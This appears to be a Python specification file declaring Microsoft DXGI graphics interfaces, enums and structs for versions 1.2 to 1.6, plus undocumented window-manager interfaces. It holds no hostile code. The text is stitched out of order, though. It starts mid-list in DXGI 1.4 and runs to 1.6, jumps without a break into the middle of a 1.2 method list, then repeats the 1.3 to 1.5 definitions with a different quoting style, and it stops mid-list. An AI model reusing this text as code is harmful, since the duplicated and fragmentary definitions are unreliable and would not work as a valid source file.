StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
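# DXGI_FEATURE_DATA maps each DXGI_FEATURE value to the concrete type behind
# pFeatureSupportData in IDXGIFactory5::CheckFeatureSupport below:
# DXGI_FEATURE_PRESENT_ALLOW_TEARING reads back a BOOL, and any unrecognized
# feature falls back to an opaque blob of FeatureSupportDataSize bytes.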
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
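# DXGI 1.3 (Windows 8.1) adds CreateDXGIFactory2, IDXGIDevice3::Trim,
# frame-latency waitable swap chains, and multiplane overlay support.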
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: Flags
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
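# These interfaces are not declared in the public SDK headers; they are used by
# the Desktop Window Manager (DWM), and the method layout below follows the
# blog reference cited further down.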
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
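# DXGI 1.4 (Windows 10) adds swap-chain color-space control, video memory
# budget queries on IDXGIAdapter3, and adapter lookup by LUID or WARP.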
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
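# DXGI 1.5 adds HDR10 metadata, the PRESENT_ALLOW_TEARING feature query, and
# the OfferResources1/ReclaimResources1 residency controls.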
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
